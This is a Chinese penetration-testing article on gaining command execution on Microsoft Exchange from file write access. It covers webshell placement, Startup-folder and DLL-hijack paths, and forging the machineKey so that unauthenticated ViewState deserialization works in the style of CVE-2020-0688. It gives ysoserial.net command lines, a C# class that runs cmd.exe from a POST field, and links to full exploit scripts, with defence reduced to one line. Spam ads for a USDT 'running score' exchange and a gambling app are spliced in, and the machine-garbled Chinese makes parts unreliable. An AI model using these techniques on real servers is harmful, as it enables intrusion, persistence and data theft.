皇冠app下载（www.huangguan.us）：渗透技巧——从Exchange文件读写权限到下令执行

USDT跑分平台

U交所（www.payusdt.vip）是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

0x00 前言

在现实的渗透测试历程中，我们会遇到种种差其余环境，例如获得了Exchange服务器的文件读写权限，然则无法执行下令。

本文将要提供一种实现方式，剖析行使思绪，先容剧本开发的细节，给出防御建议。

0x01 简介

本文将要先容以下内容：

· 解决思绪

· 行使方式

· 程序实现

· 防御建议

0x02 解决思绪

1.通例解决思绪

(1)写入Webshell

通常选择以下两个位置：

· %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth

· %ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth

选择这两个位置的优点是可以直接接见Webshell。

也可以选择其他位置，例如%ExchangeInstallPath%\ClientAccess\ecp\，写入的文件名称有限制，下令规则可参考%ExchangeInstallPath%\ClientAccess\ecp\web.config。

注：

接见%ExchangeInstallPath%\ClientAccess\下的webshell需要添加正当用户的登录Cookie。

总的来说，通过写入Webshell的方式对照直接，然则Exchange服务器有可能禁用了下令执行权限或是阻挡系统函数的挪用，依旧无法获得下令执行权限。

(2)写入PE文件

写入exe文件，可选择以下两种启动文件夹：

· 系统启动文件夹的位置：%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup

· 用户启动文件夹的位置：%USERPROFILE%\Appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

写入dll文件，可选择系统常见的dll挟制位置，例如c:\Windows\System32\fxsst.dll，更多细节可参考：https://github.com/3gstudent/Pentest-and-Development-Tips/blob/master/README-en.md，method-16-windows-fax-dll-injection

总的来说，通过写入PE文件的方式对照被动，需要守候系统加载，无法做到实时的下令执行。

2.有用的解决思绪

修改Exchange设置，设置MachineKey，通过.Net反序列化实现下令执行

可供学习的资料：

· http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html

· https://blog.knownsec.com/2020/11/net-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b9%8b-viewstate-%e5%88%a9%e7%94%a8/

简朴来说，我们通过设置MachineKey，就能够实现与CVE-2020-0688同样的效果，也就是说，设置MachineKey为默认值后，可以直接使用CVE-2020-0688的行使工具实现下令执行。

0x03 行使方式

1.修改%ExchangeInstallPath%\ClientAccess\ecp\web.config

将：

修改为：

若是没有这一属性，那么就在system.web下添加：

接下来就可以直接使用CVE-2020-0688的行使工具，成熟的行使工具可选择：https://github.com/zcgonvh/CVE-2020-0688/，相比其它已开源的行使工具，这款工具能够实时获得下令执行效果，也支持加载shellcode的功效，其中的手艺细节值得深入研究。

注：

CVE-2020-0688的行使工具多数借助ysoserial.net的TextFormattingRunProperties实现下令执行，无法实时获得下令执行效果。

ysoserial.net-1.32的ActivitySurrogateSelectorFromFile能够通过Assembly.Load加载.Net程序集实现返回下令执行的效果，然则兼容性不够，无法做到支持所有版本的.Net环境。

zcgonvh开源的CVE-2020-0688行使工具解决了ysoserial.net-1.32中ActivitySurrogateSelectorFromFile兼容性的问题，同时对通讯数据做了AES加密。

ysoserial.net-1.33修复了ActivitySurrogateSelectorFromFile兼容性的bug，bug由zcgonvh修复。

我们知道，CVE-2020-0688的行使条件是需要掌握一个正当用户的凭证，而我们只获得了Exchange服务器的文件读写权限，还无法立刻获得正当用户的凭证，这里可以使用接下来的两种方式绕过这个限制。

(1)修改%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config

这里validationKey和decryptionKey可以随便指定，字符局限为十六进制，即0~F。

也可以选用以下算法：

· MD5

· AES

· HMACSHA256

· HMACSHA384

· HMACSHA512

密钥长度需要相符算法要求，学习资料：

https://devblogs.microsoft.com/aspnet/cryptographic-improvements-in-asp-net-4-5-pt-1/

,

USDT跑分

U交所（www.payusdt.vip）是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,

(2)修改%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config

方式同上。

对于这两个位置的.Net反序列化下令执行，不再需要正当用户的凭证，以是行使程序也需要做修改。下面先容三种行使程序实现的细节。

0x04 实现细节

1.盘算VIEWSTATEGENERATOR的两种方式

Exchange的.Net反序列化用的是ViewState，其中必备的参数为VIEWSTATEGENERATOR，例如Python实现的CVE-2020-0688行使工具中使用的默认VIEWSTATEGENERATOR为B97B4E27，示意的页面为ecp/default.aspx，对应的ysoserial.net的参数为--path="/ecp/default.aspx" --apppath="/ecp/"

下面先容两种盘算VIEWSTATEGENERATOR的方式：

C，实现的代码如下：

using System;
class a
{
    static void Main(string[] args)
    {
        int hashcode = StringComparer.InvariantCultureIgnoreCase.GetHashCode("/ecp");
    uint _clientstateid=(uint)(hashcode
+StringComparer.InvariantCultureIgnoreCase.GetHashCode("default_aspx"));
Console.WriteLine(_clientstateid.ToString("X2"));
    }
}

得出效果为B97B4E27。

注：

代码来自http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html

也可以通过网页自动盘算，方式如下：

在现实测试环境中，修改ecp/default.aspx的内容如下：

通过浏览器接见该页面，返回效果中的__VIEWSTATEGENERATOR即为盘算后的效果。

2.不需要正当用户凭证的三种反序列化程序实现。

(1)借助ysoserial.net的TextFormattingRunProperties实现下令执行的Python代码。

CVE-2020-0688中对应ysoserial.net的参数花样如下：

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{generator}" --viewstateuserkey="{}"

由于我们的行使不需要正当用户的凭证，新的ysoserial.net参数花样为：

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"

参数说明如下：

· {command}对应我们要执行的下令

· {key}对应我们设置的validationKey

· {generator}对应要接见页面的VIEWSTATEGENERATOR

借助ysoserial.net的TextFormattingRunProperties天生最终的VIEWSTATE数据后，拼接成以下花样：

https://{url}?__VIEWSTATEGENERATOR={generator}&__VIEWSTATE={out_payload}

发送GET数据包即可。

下面举例举行说明：

选择Exchange默认的错误页面：%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx

owa\auth\errorFE.aspx对应的VIEWSTATEGENERATOR为042A94E8

借助ysoserial.net的TextFormattingRunProperties天生最终的VIEWSTATE数据。

最终接见的URL为：https://

完整的实现代码已上传至github，地址如下：

https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

代码支持两个位置的反序列化执行，划分为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx

注：

由于我们已获得了Exchange服务器的文件读写权限，这里可以将代码效果输出至指定文件举行查看，下令示例：net user /domain >c:\test.txt

(2)借助ysoserial.net的ActivitySurrogateSelectorFromFile实现下令执行并返回执行效果的Python代码。

这里使用ysoserial.net的版本需要高于1.32，以阻止ActivitySurrogateSelectorFromFile兼容性的bug。

新建文件ExploitClass.cs，内容如下：

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}

注：

代码引用自https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/

更多用法可参考https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/ExploitClass.cs

ysoserial.net的参数花样如下：

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;System.Web.dll;System.dll;" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}

借助ysoserial.net的ActivitySurrogateSelectorFromFile天生最终的VIEWSTATE数据后，组织POST数据包，添加名为cmd的参数，参数值为要执行的下令。

高版本的.NET Framework会阻止ActivitySurrogateSelector，可借助ysoserial.netActivitySurrogateDisableTypeCheck举行绕过，对应的参数花样如下：

ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck -c "ignore" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"

完整的实现代码已上传至github，地址如下：

· https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

代码支持两个位置的反序列化执行，划分为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx

代码能够执行下令并获得下令执行的效果，通过POST方式以参数__Value发送数据，通讯数据接纳逐字符异或加密。

(3)基于https://github.com/zcgonvh/CVE-2020-0688/实现无凭证行使的C，代码

VIEWSTATE数据的天生历程同https://github.com/zcgonvh/CVE-2020-0688/保持一致，只需要将validationkey作为变量传入即可。

%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config均没有限制POST请求，以是在行使上不再需要写入空文件，可以直接天生最终的VIEWSTATE数据并通过POST的方式发送数据。

完整的实现代码已上传至github，地址如下：

· https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs

代码支持两个位置的反序列化执行，划分为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx

支持的功效同https://github.com/zcgonvh/CVE-2020-0688/保持一致。

0x05 防御检测

在Exchange服务器被入侵后，不仅需要查杀有无可疑的Webshell，同样需要判断web.config中的machineKey是否被修改。

0x06 小结

本文提供了一种从Exchange文件读写权限到下令执行的实现方式，剖析行使思绪，先容三种行使剧本的开发细节，给出防御建议。

：